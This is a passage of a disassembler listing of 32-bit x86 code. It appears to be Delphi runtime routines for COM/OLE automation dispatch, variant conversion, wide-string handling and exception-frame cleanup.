test eax, eax
jnz short loc_400161FD
lea eax, [ebp+var_8]
call sub_40005008
push eax
mov eax, [ebp+var_4]
push eax
mov eax, [eax]
call dword ptr [eax+10h]
lea eax, [ebp+var_C]
call sub_40005008
push eax
mov eax, [ebp+var_4]
push eax
mov eax, [eax]
call dword ptr [eax+14h]
lea eax, [ebp+var_10]
call sub_40005008
push eax
mov eax, [ebp+var_4]
push eax
mov eax, [eax]
call dword ptr [eax+18h]
lea eax, [ebp+var_14]
push eax
mov eax, [ebp+var_4]
push eax
mov eax, [eax]
call dword ptr [eax+1Ch]
loc_400161FD: ; CODE XREF: sub_40016180+38�j
push esi
push ebx
lea eax, [ebp+var_18]
mov edx, [ebp+var_8]
call sub_40004B0C
mov eax, [ebp+var_18]
push eax
lea eax, [ebp+var_1C]
mov edx, [ebp+var_10]
call sub_40004B0C
mov eax, [ebp+var_1C]
push eax
mov eax, [ebp+var_14]
push eax
lea eax, [ebp+var_20]
mov edx, [ebp+var_C]
call sub_40004B0C
mov ecx, [ebp+var_20]
mov dl, 1
mov eax, ds:off_40015DDC
call sub_40015FB8
jmp sub_400042E4
; ---------------------------------------------------------------------------
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40016277
loc_4001624D: ; CODE XREF: .text:40016275�j
lea eax, [ebp+var_20]
mov edx, 3
call sub_400048A8
lea eax, [ebp+var_10]
mov edx, 3
call sub_40005020
lea eax, [ebp+var_4]
call sub_40006204
retn
; ---------------------------------------------------------------------------
loc_40016270: ; DATA XREF: sub_40016180+16�o
jmp loc_40004204
sub_40016180 endp
; ---------------------------------------------------------------------------
jmp short loc_4001624D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40016180
loc_40016277: ; CODE XREF: sub_40016180+EF�j
; DATA XREF: sub_40016180+C8�o
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_40016180
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40016280 proc near ; CODE XREF: sub_400166E8+8F�p
var_650 = dword ptr -650h
var_250 = dword ptr -250h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 40004204 SIZE 00000080 BYTES
; FUNCTION CHUNK AT 400042A4 SIZE 00000006 BYTES
push ebp
mov ebp, esp
add esp, 0FFFFF9B0h
push ebx
push esi
push edi
mov [ebp+var_28], ecx
mov esi, edx
mov [ebp+var_24], eax
lea eax, [ebp+var_20]
mov edx, ds:off_40006ABC
call sub_40005204
xor eax, eax
push ebp
push offset loc_400165AB
push dword ptr fs:[eax]
mov fs:[eax], esp
xor eax, eax
mov [ebp+var_30], eax
xor ecx, ecx
push ebp
push offset loc_40016588
push dword ptr fs:[ecx]
mov fs:[ecx], esp
movzx edi, byte ptr [esi+1]
cmp edi, 40h
jle short loc_400162E3
mov ecx, off_4001AF64
mov dl, 1
mov eax, ds:off_40015DDC
call sub_4000B0EC
call sub_400042E4
loc_400162E3: ; CODE XREF: sub_40016280+4A�j
test edi, edi
jz loc_400164AC
mov eax, [ebp+arg_4]
mov [ebp+var_34], eax
mov eax, edi
add eax, eax
lea eax, [ebp+eax*8+var_650]
mov [ebp+var_38], eax
xor ebx, ebx
loc_40016301: ; CODE XREF: sub_40016280+226�j
sub [ebp+var_38], 10h
movzx eax, byte ptr [esi+ebx+3]
mov edx, eax
and dl, 7Fh
movzx edx, dl
mov [ebp+var_2C], edx
and al, 80h
cmp [ebp+var_2C], 0Ah
jnz short loc_40016335
mov eax, [ebp+var_38]
mov dword ptr [eax], 0Ah
mov eax, [ebp+var_38]
mov dword ptr [eax+8], 80020004h
jmp loc_400164A3
; ---------------------------------------------------------------------------
loc_40016335: ; CODE XREF: sub_40016280+9B�j
cmp [ebp+var_2C], 48h
jnz short loc_400163AF
mov edx, [ebp+var_30]
lea edx, [ebp+edx*8+var_250]
mov [ebp+var_3C], edx
test al, al
jz short loc_4001637C
mov eax, [ebp+var_34]
mov eax, [eax]
mov eax, [eax]
call sub_40005674
mov edx, [ebp+var_3C]
mov [edx], eax
mov eax, [ebp+var_34]
mov eax, [eax]
mov edx, [ebp+var_3C]
mov [edx+4], eax
mov eax, [ebp+var_38]
mov dword ptr [eax], 4008h
mov eax, [ebp+var_3C]
mov edx, [ebp+var_38]
mov [edx+8], eax
jmp short loc_400163A7
; ---------------------------------------------------------------------------
loc_4001637C: ; CODE XREF: sub_40016280+CA�j
mov eax, [ebp+var_34]
mov eax, [eax]
call sub_40005674
mov edx, [ebp+var_3C]
mov [edx], eax
mov eax, [ebp+var_3C]
xor edx, edx
mov [eax+4], edx
mov eax, [ebp+var_38]
mov dword ptr [eax], 8
mov eax, [ebp+var_3C]
mov eax, [eax]
mov edx, [ebp+var_38]
mov [edx+8], eax
loc_400163A7: ; CODE XREF: sub_40016280+FA�j
inc [ebp+var_30]
jmp loc_4001649F
; ---------------------------------------------------------------------------
loc_400163AF: ; CODE XREF: sub_40016280+B9�j
test al, al
jz short loc_400163F8
cmp [ebp+var_2C], 0Ch
jnz short loc_400163DB
mov eax, [ebp+var_34]
mov eax, [eax]
cmp word ptr [eax], 100h
jnz short loc_400163DB
mov eax, [ebp+var_34]
mov eax, [eax]
mov edx, eax
mov eax, [ebp+var_34]
mov eax, [eax]
mov ecx, 8
call sub_4000E9CC
loc_400163DB: ; CODE XREF: sub_40016280+137�j
; sub_40016280+143�j
mov eax, [ebp+var_2C]
or eax, 4000h
mov edx, [ebp+var_38]
mov [edx], eax
mov eax, [ebp+var_34]
mov eax, [eax]
mov edx, [ebp+var_38]
mov [edx+8], eax
jmp loc_4001649F
; ---------------------------------------------------------------------------
loc_400163F8: ; CODE XREF: sub_40016280+131�j
cmp [ebp+var_2C], 0Ch
jnz short loc_40016471
mov eax, [ebp+var_34]
cmp word ptr [eax], 100h
jnz short loc_40016446
mov eax, [ebp+var_30]
lea eax, [ebp+eax*8+var_250]
mov [ebp+var_40], eax
mov eax, [ebp+var_34]
mov eax, [eax+8]
call sub_40005674
mov edx, [ebp+var_40]
mov [edx], eax
mov eax, [ebp+var_40]
xor edx, edx
mov [eax+4], edx
mov eax, [ebp+var_38]
mov dword ptr [eax], 8
mov eax, [ebp+var_40]
mov eax, [eax]
mov edx, [ebp+var_38]
mov [edx+8], eax
inc [ebp+var_30]
jmp short loc_4001649F
; ---------------------------------------------------------------------------
loc_40016446: ; CODE XREF: sub_40016280+186�j
mov eax, [ebp+var_34]
mov edx, [eax]
mov ecx, [ebp+var_38]
mov [ecx], edx
mov edx, [eax+4]
mov ecx, [ebp+var_38]
mov [ecx+4], edx
mov edx, [eax+8]
mov ecx, [ebp+var_38]
mov [ecx+8], edx
mov eax, [eax+0Ch]
mov edx, [ebp+var_38]
mov [edx+0Ch], eax
add [ebp+var_34], 0Ch
jmp short loc_4001649F
; ---------------------------------------------------------------------------
loc_40016471: ; CODE XREF: sub_40016280+17C�j
mov eax, [ebp+var_38]
mov edx, [ebp+var_2C]
mov [eax], edx
mov eax, [ebp+var_34]
mov eax, [eax]
mov edx, [ebp+var_38]
mov [edx+8], eax
cmp [ebp+var_2C], 5
jl short loc_4001649F
cmp [ebp+var_2C], 7
jg short loc_4001649F
add [ebp+var_34], 4
mov eax, [ebp+var_34]
mov eax, [eax]
mov edx, [ebp+var_38]
mov [edx+0Ch], eax
loc_4001649F: ; CODE XREF: sub_40016280+12A�j
; sub_40016280+173�j ...
add [ebp+var_34], 4
loc_400164A3: ; CODE XREF: sub_40016280+B0�j
inc ebx
cmp edi, ebx
jnz loc_40016301
loc_400164AC: ; CODE XREF: sub_40016280+65�j
lea eax, [ebp+var_650]
mov [ebp+var_50], eax
mov eax, [ebp+var_28]
add eax, 4
mov [ebp+var_4C], eax
mov [ebp+var_48], edi
movzx eax, byte ptr [esi+2]
mov [ebp+var_44], eax
mov eax, [ebp+var_28]
mov edx, [eax]
movzx eax, byte ptr [esi]
cmp eax, 4
jnz short loc_400164FD
mov ecx, [ebp+var_650]
and ecx, 0FFFh
cmp ecx, 9
jnz short loc_400164EB
mov eax, 8
loc_400164EB: ; CODE XREF: sub_40016280+264�j
mov ecx, [ebp+var_28]
mov dword ptr [ecx], 0FFFFFFFDh
sub [ebp+var_4C], 4
inc [ebp+var_44]
jmp short loc_40016511
; ---------------------------------------------------------------------------
loc_400164FD: ; CODE XREF: sub_40016280+253�j
cmp eax, 1
jnz short loc_40016511
test edi, edi
jnz short loc_40016511
cmp [ebp+arg_0], 0
jz short loc_40016511
mov eax, 3
loc_40016511: ; CODE XREF: sub_40016280+27B�j
; sub_40016280+280�j ...
push 0
lea ecx, [ebp+var_20]
push ecx
mov ecx, [ebp+arg_0]
push ecx
lea ecx, [ebp+var_50]
push ecx
push eax
push 0
mov eax, off_4001AFA8
push eax
push edx
mov eax, [ebp+var_24]
push eax
mov eax, [eax]
call dword ptr [eax+18h]
test eax, eax
jz short loc_4001653E
lea edx, [ebp+var_20]
call sub_40016858
loc_4001653E: ; CODE XREF: sub_40016280+2B4�j
mov ebx, [ebp+var_30]
test ebx, ebx
jz short loc_40016561
loc_40016545: ; CODE XREF: sub_40016280+2DF�j
dec ebx
lea esi, [ebp+ebx*8+var_250]
mov edi, [esi+4]
test edi, edi
jz short loc_4001655D
mov edx, edi
mov eax, [esi]
call sub_40005650
loc_4001655D: ; CODE XREF: sub_40016280+2D2�j
test ebx, ebx
jnz short loc_40016545
loc_40016561: ; CODE XREF: sub_40016280+2C3�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4001658F
loc_4001656E: ; CODE XREF: sub_40016280+30D�j
mov ebx, [ebp+var_30]
test ebx, ebx
jz short locret_40016587
loc_40016575: ; CODE XREF: sub_40016280+305�j
dec ebx
mov eax, [ebp+ebx*8+var_250]
push eax
call sub_40006B00
test ebx, ebx
jnz short loc_40016575
locret_40016587: ; CODE XREF: sub_40016280+2F3�j
retn
; ---------------------------------------------------------------------------
loc_40016588: ; DATA XREF: sub_40016280+38�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4001656E
; ---------------------------------------------------------------------------
loc_4001658F: ; DATA XREF: sub_40016280+2E9�o
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_400165B2
loc_4001659C: ; CODE XREF: sub_40016280+330�j
lea eax, [ebp+var_20]
mov edx, ds:off_40006ABC
call sub_400052C8
retn
; ---------------------------------------------------------------------------
loc_400165AB: ; DATA XREF: sub_40016280+25�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4001659C
; ---------------------------------------------------------------------------
loc_400165B2: ; CODE XREF: sub_40016280+32A�j
; DATA XREF: sub_40016280+317�o
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
sub_40016280 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_400165BC proc near ; CODE XREF: sub_400165F0+C4�p
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
mov eax, [ebp+arg_0]
mov eax, [eax-4]
mov [ebp+var_8], eax
mov [ebp+var_4], 6
lea eax, [ebp+var_8]
push eax
push 0
mov ecx, off_4001B044
mov dl, 1
mov eax, ds:off_40015D28
call sub_4000B128
call sub_400042E4
pop ecx
pop ecx
pop ebp
retn
sub_400165BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_400165F0 proc near ; CODE XREF: sub_400166E8+6F�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFE4h
push ebx
push esi
push edi
mov [ebp+var_C], ecx
mov [ebp+var_4], edx
mov [ebp+var_1C], eax
mov ebx, [ebp+var_4]
xor edi, edi
mov [ebp+var_8], esp
mov eax, [ebp+var_C]
inc eax
shl eax, 2
sub esp, eax
lea eax, [ebp+var_10]
mov [eax], esp
loc_40016618: ; CODE XREF: sub_400165F0+99�j
mov eax, ebx
call sub_4000815C
mov esi, eax
push 0
push 0
push esi
push ebx
push 0
push 0
call sub_40006610 ; MultiByteToWideChar
inc eax
mov [ebp+var_14], eax
mov eax, [ebp+var_14]
add eax, eax
add eax, 3
and eax, 0FFFFFFFCh
sub esp, eax
lea eax, [ebp+var_18]
mov [eax], esp
test edi, edi
jnz short loc_40016654
mov eax, [ebp+var_10]
mov edx, [ebp+var_18]
mov [eax], edx
jmp short loc_40016662
; ---------------------------------------------------------------------------
loc_40016654: ; CODE XREF: sub_400165F0+58�j
mov eax, [ebp+var_C]
sub eax, edi
mov edx, [ebp+var_10]
mov ecx, [ebp+var_18]
mov [edx+eax*4], ecx
loc_40016662: ; CODE XREF: sub_400165F0+62�j
mov eax, [ebp+var_14]
push eax
mov eax, [ebp+var_18]
push eax
push esi
push ebx
push 0
push 0
call sub_40006610 ; MultiByteToWideChar
mov eax, [ebp+var_18]
mov edx, [ebp+var_14]
mov word ptr [eax+edx*2-2], 0
inc esi
add ebx, esi
inc edi
cmp edi, [ebp+var_C]
jnz short loc_40016618
mov eax, [ebp+arg_0]
push eax
call sub_400065C8 ; GetThreadLocale
push eax
mov eax, [ebp+var_C]
push eax
mov eax, [ebp+var_10]
push eax
mov eax, off_4001AFA8
push eax
mov eax, [ebp+var_1C]
push eax
mov eax, [eax]
call dword ptr [eax+14h]
cmp eax, 80020006h
jnz short loc_400166BC
push ebp
call sub_400165BC
pop ecx
jmp short loc_400166C1
; ---------------------------------------------------------------------------
loc_400166BC: ; CODE XREF: sub_400165F0+C1�j
call sub_4001606C
loc_400166C1: ; CODE XREF: sub_400165F0+CA�j
mov esp, [ebp+var_8]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_400165F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_400166D0 proc near ; CODE XREF: sub_400166E8:loc_4001673B�p
mov ecx, off_4001B07C
mov dl, 1
mov eax, ds:off_40015D28
call sub_4000B0EC
call sub_400042E4
retn
sub_400166D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_400166E8 proc near ; DATA XREF: .itext:400193A6�o
; .bss:off_4001F294�o
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
add esp, 0FFFFFEFCh
push ebx
push esi
mov ebx, [ebp+arg_8]
mov eax, [ebp+arg_4]
mov esi, [ebp+arg_0]
cmp byte ptr [ebx+1], 40h
jbe short loc_40016719
mov ecx, off_4001AF64
mov dl, 1
mov eax, ds:off_40015D28
call sub_4000B0EC
call sub_400042E4
loc_40016719: ; CODE XREF: sub_400166E8+18�j
movzx edx, word ptr [eax]
cmp dx, 9
jnz short loc_4001672A
mov eax, [eax+8]
mov [ebp+var_4], eax
jmp short loc_40016740
; ---------------------------------------------------------------------------
loc_4001672A: ; CODE XREF: sub_400166E8+38�j
cmp dx, 4009h
jnz short loc_4001673B
mov eax, [eax+8]
mov eax, [eax]
mov [ebp+var_4], eax
jmp short loc_40016740
; ---------------------------------------------------------------------------
loc_4001673B: ; CODE XREF: sub_400166E8+47�j
call sub_400166D0
loc_40016740: ; CODE XREF: sub_400166E8+40�j
; sub_400166E8+51�j
lea eax, [ebp+var_104]
push eax
movzx ecx, byte ptr [ebx+2]
inc ecx
movzx eax, byte ptr [ebx+1]
lea edx, [ebx+eax+3]
mov eax, [ebp+var_4]
call sub_400165F0
test esi, esi
jz short loc_40016767
mov eax, esi
call sub_4000E3D8
loc_40016767: ; CODE XREF: sub_400166E8+76�j
mov eax, [ebp+arg_C]
push eax
push esi
lea ecx, [ebp+var_104]
mov edx, ebx
mov eax, [ebp+var_4]
call sub_40016280
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_400166E8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40016784 proc near ; CODE XREF: sub_40016858+4�p
; sub_40016874+D4�j
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push 0
push 0
push 0
push 0
push ebx
push esi
mov [ebp+var_4], ecx
mov ebx, edx
xor edx, edx
push ebp
push offset loc_40016849
push dword ptr fs:[edx]
mov fs:[edx], esp
cmp eax, 80020009h
jnz short loc_40016802
mov eax, [ebx+1Ch]
push eax
lea eax, [ebp+var_8]
mov edx, [ebx+4]
call sub_40004B0C
mov eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
mov edx, [ebx+0Ch]
call sub_40004B0C
mov eax, [ebp+var_C]
push eax
mov eax, [ebx+10h]
push eax
lea eax, [ebp+var_10]
mov edx, [ebx+8]
call sub_40004B0C
mov ecx, [ebp+var_10]
mov dl, 1
mov eax, ds:off_40015DDC
call sub_40015FB8
mov esi, eax
cmp [ebp+arg_0], 0
jz short loc_40016815
mov eax, ebx
mov edx, ds:off_40006ABC
call sub_40005400
jmp short loc_40016815
; ---------------------------------------------------------------------------
loc_40016802: ; CODE XREF: sub_40016784+25�j
push eax
push 0
xor ecx, ecx
mov dl, 1
mov eax, ds:off_40015D80
call sub_40015EE4
mov esi, eax
loc_40016815: ; CODE XREF: sub_40016784+6D�j
; sub_40016784+7C�j
cmp [ebp+var_4], 0
jz short loc_40016827
push [ebp+var_4]
mov eax, esi
jmp sub_400042E4
; ---------------------------------------------------------------------------
jmp short loc_4001682E
; ---------------------------------------------------------------------------
loc_40016827: ; CODE XREF: sub_40016784+95�j
mov eax, esi
call sub_400042E4
loc_4001682E: ; CODE XREF: sub_40016784+A1�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40016850
loc_4001683B: ; CODE XREF: sub_40016784+CA�j
lea eax, [ebp+var_10]
mov edx, 3
call sub_400048A8
retn
; ---------------------------------------------------------------------------
loc_40016849: ; DATA XREF: sub_40016784+15�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4001683B
; ---------------------------------------------------------------------------
loc_40016850: ; CODE XREF: sub_40016784+C4�j
; DATA XREF: sub_40016784+B2�o
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_40016784 endp
; =============== S U B R O U T I N E =======================================
sub_40016858 proc near ; CODE XREF: sub_40016280+2B9�p
push 0
xor ecx, ecx
call sub_40016784
retn
sub_40016858 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40016864 proc near ; CODE XREF: sub_40016874+A6�p
xor ecx, ecx
mov edx, 20h
call sub_40003580
retn
sub_40016864 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40016874 proc near ; CODE XREF: sub_40016958+1E�p
var_30 = byte ptr -30h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFD0h
push ebx
push esi
push edi
mov ebx, [ebp+arg_4]
xor edx, edx
mov edi, esp
movzx ecx, byte ptr [ebx+1]
mov [ebp+var_8], ecx
test ecx, ecx
jz short loc_400168DA
add ebx, 3
mov esi, [ebp+arg_10]
loc_40016895: ; CODE XREF: sub_40016874+61�j
movzx eax, byte ptr [ebx]
test al, 80h
jnz short loc_400168C4
cmp al, 0Ch
jz short loc_400168B4
cmp al, 5
jb short loc_400168CB
cmp al, 7
ja short loc_400168CB
push dword ptr [esi+4]
push dword ptr [esi]
push edx
push eax
add esi, 8
jmp short loc_400168D3
; ---------------------------------------------------------------------------
loc_400168B4: ; CODE XREF: sub_40016874+2A�j
push dword ptr [esi+0Ch]
push dword ptr [esi+8]
push dword ptr [esi+4]
push dword ptr [esi]
add esi, 10h
jmp short loc_400168D3
; ---------------------------------------------------------------------------
loc_400168C4: ; CODE XREF: sub_40016874+26�j
and al, 7Fh
or eax, 4000h
loc_400168CB: ; CODE XREF: sub_40016874+2E�j
; sub_40016874+32�j
push edx
push dword ptr [esi]
push edx
push eax
add esi, 4
loc_400168D3: ; CODE XREF: sub_40016874+3E�j
; sub_40016874+4E�j
inc ebx
dec ecx
jnz short loc_40016895
mov ebx, [ebp+arg_4]
loc_400168DA: ; CODE XREF: sub_40016874+19�j
mov [ebp+var_10], esp
movzx eax, byte ptr [ebx+2]
mov [ebp+var_4], eax
test eax, eax
jz short loc_400168F2
mov esi, [ebp+arg_C]
loc_400168EB: ; CODE XREF: sub_40016874+7C�j
push dword ptr [esi+eax*4-4]
dec eax
jnz short loc_400168EB
loc_400168F2: ; CODE XREF: sub_40016874+72�j
movzx ecx, byte ptr [ebx]
cmp ecx, 4
jnz short loc_40016910
push 0FFFFFFFDh
inc [ebp+var_4]
cmp byte ptr [ebx+3], 9
jz short loc_4001690B
cmp byte ptr [ebx+3], 0Dh
jnz short loc_40016910
loc_4001690B: ; CODE XREF: sub_40016874+8F�j
mov ecx, 8
loc_40016910: ; CODE XREF: sub_40016874+84�j
; sub_40016874+95�j
mov [ebp+var_C], esp
push edx
lea eax, [ebp+var_30]
push eax
push ecx
push edx
call sub_40016864
pop edx
pop ecx
push [ebp+arg_14]
lea eax, [ebp+var_10]
push eax
push ecx
push edx
push offset dword_4001A7CC
push [ebp+arg_8]
mov eax, [ebp+arg_0]
push eax
mov eax, [eax]
call dword ptr [eax+18h]
test eax, eax
jz short loc_4001694D
lea edx, [ebp+var_30]
mov cl, 1
push ecx
mov ecx, [ebp+4]
jmp sub_40016784
; ---------------------------------------------------------------------------
loc_4001694D: ; CODE XREF: sub_40016874+C9�j
mov esp, edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 18h
sub_40016874 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40016958 proc near ; DATA XREF: .itext:400193B8�o
; .bss:off_4001C000�o
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = qword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_8]
xor eax, eax
push eax
push eax
push eax
push eax
mov eax, esp
push eax
lea eax, [ebp+arg_C]
push eax
push eax
push dword ptr [ebx]
lea eax, [ebx+5]
push eax
push [ebp+arg_4]
call sub_40016874
movzx eax, byte ptr [ebx+4]
mov ebx, [ebp+arg_0]
jmp ds:off_40016989[eax*4]
; ---------------------------------------------------------------------------
off_40016989 dd offset loc_40016A2E ; DATA XREF: sub_40016958+2A�r
dd offset loc_40016A2E
dd offset loc_40016A2A
dd offset loc_40016A2A
dd offset loc_400169CD
dd offset loc_400169D3
dd offset loc_400169D9
dd offset loc_400169D3
dd offset loc_400169DF
dd offset loc_400169F3
dd offset loc_40016A2E
dd offset loc_40016A2A
dd offset loc_40016A07
dd offset loc_400169F3
dd offset loc_40016A2E
dd offset loc_40016A2E
dd offset loc_40016A2A
; ---------------------------------------------------------------------------
loc_400169CD: ; CODE XREF: sub_40016958+2A�j
; DATA XREF: sub_40016958+41�o
fld dword ptr [esp+14h+var_C]
jmp short loc_40016A2E
; ---------------------------------------------------------------------------
loc_400169D3: ; CODE XREF: sub_40016958+2A�j
; DATA XREF: sub_40016958+45�o ...
fld [esp+14h+var_C]
jmp short loc_40016A2E
; ---------------------------------------------------------------------------
loc_400169D9: ; CODE XREF: sub_40016958+2A�j
; DATA XREF: sub_40016958+49�o
fild [esp+14h+var_C]
jmp short loc_40016A2E
; ---------------------------------------------------------------------------
loc_400169DF: ; CODE XREF: sub_40016958+2A�j
; DATA XREF: sub_40016958+51�o
mov eax, [ebx]
test eax, eax
jz short loc_400169EB
push eax
call sub_40006B00
loc_400169EB: ; CODE XREF: sub_40016958+8B�j
mov eax, dword ptr [esp+14h+var_C]
mov [ebx], eax
jmp short loc_40016A2E
; ---------------------------------------------------------------------------
loc_400169F3: ; CODE XREF: sub_40016958+2A�j
; DATA XREF: sub_40016958+55�o ...
mov eax, [ebx]
test eax, eax
jz short loc_400169FF
push eax
mov eax, [eax]
call dword ptr [eax+8]
loc_400169FF: ; CODE XREF: sub_40016958+9F�j
mov eax, dword ptr [esp+14h+var_C]
mov [ebx], eax
jmp short loc_40016A2E
; ---------------------------------------------------------------------------
loc_40016A07: ; CODE XREF: sub_40016958+2A�j
; DATA XREF: sub_40016958+61�o
mov eax, ebx
call sub_4000E3D8
mov eax, [esp+14h+var_14]
mov [ebx], eax
mov eax, [esp+14h+var_10]
mov [ebx+4], eax
mov eax, dword ptr [esp+14h+var_C]
mov [ebx+8], eax
mov eax, dword ptr [esp+14h+var_C+4]
mov [ebx+0Ch], eax
jmp short loc_40016A2E
; ---------------------------------------------------------------------------
loc_40016A2A: ; CODE XREF: sub_40016958+2A�j
; DATA XREF: sub_40016958+39�o ...
mov eax, dword ptr [esp+14h+var_C]
loc_40016A2E: ; CODE XREF: sub_40016958+2A�j
; sub_40016958+79�j ...
add esp, 10h
pop ebx
pop ebp
retn
sub_40016958 endp
; =============== S U B R O U T I N E =======================================
sub_40016A34 proc near ; DATA XREF: .itext:400193E6�o
; .bss:off_4001C044�o
cmp ds:dword_4001F370, 0
jz short loc_40016A43
call ds:dword_4001F370
loc_40016A43: ; CODE XREF: sub_40016A34+7�j
cmp dword_4001ADA0, 0FFFFFFFFh
jz short loc_40016A9B
cmp dword_4001AD8C, 0
jz short loc_40016A9B
mov eax, dword_4001ADA0
push eax
push 0
call dword_4001AD8C
test eax, 80000000h
setz al
mov ds:byte_4001F374, al
mov eax, off_4001AF20
cmp byte ptr [eax], 0
jnz short loc_40016A90
test byte ptr dword_4001ADA0, 2
jnz short loc_40016A90
cmp dword_4001ADA0, 0
jz short loc_40016A90
xor eax, eax
jmp short loc_40016A92
; ---------------------------------------------------------------------------
loc_40016A90: ; CODE XREF: sub_40016A34+44�j
; sub_40016A34+4D�j ...
mov al, 1
loc_40016A92: ; CODE XREF: sub_40016A34+5A�j
mov edx, off_4001AF20
mov [edx], al
retn
; ---------------------------------------------------------------------------
loc_40016A9B: ; CODE XREF: sub_40016A34+16�j
; sub_40016A34+1F�j
push 0
call sub_40006AF0
test eax, 80000000h
setz al
mov ds:byte_4001F374, al
retn
sub_40016A34 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40016AB0 proc near ; DATA XREF: .text:400183D0�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_40016B26
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4001F364
jnz short loc_40016B18
mov ds:byte_4001F368, 1
mov eax, ds:dword_4001F36C
call sub_40003CE8
mov eax, off_4001B054
xor edx, edx
mov [eax], edx
mov eax, off_4001AEF8
xor edx, edx
mov [eax], edx
mov eax, off_4001B02C
xor edx, edx
mov [eax], edx
cmp ds:byte_4001F374, 0
jz short loc_40016B03
call sub_40006AF8
loc_40016B03: ; CODE XREF: sub_40016AB0+4C�j
mov eax, offset dword_4001ADA4
mov ecx, 5
mov edx, ds:off_40001000
call sub_40005314
loc_40016B18: ; CODE XREF: sub_40016AB0+17�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40016B2D
loc_40016B25: ; CODE XREF: sub_40016AB0+7B�j
retn
; ---------------------------------------------------------------------------
loc_40016B26: ; DATA XREF: sub_40016AB0+6�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40016B25
; ---------------------------------------------------------------------------
loc_40016B2D: ; CODE XREF: sub_40016AB0:loc_40016B25�j
; DATA XREF: sub_40016AB0+70�o
pop ebp
retn
sub_40016AB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40016B30 proc near ; CODE XREF: sub_40016B44+7F�p
jmp ds:dword_40024668
sub_40016B30 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40016B38 proc near ; CODE XREF: sub_40016B44+25�p
; sub_40016C04+31�p ...
test eax, eax
jz short locret_40016B41
sub eax, 4
mov eax, [eax]
locret_40016B41: ; CODE XREF: sub_40016B38+2�j
retn
sub_40016B38 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40016B44 proc near ; CODE XREF: .itext:400197C1�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
call sub_40004D38
xor eax, eax
push ebp
push offset loc_40016BF1
push dword ptr fs:[eax]
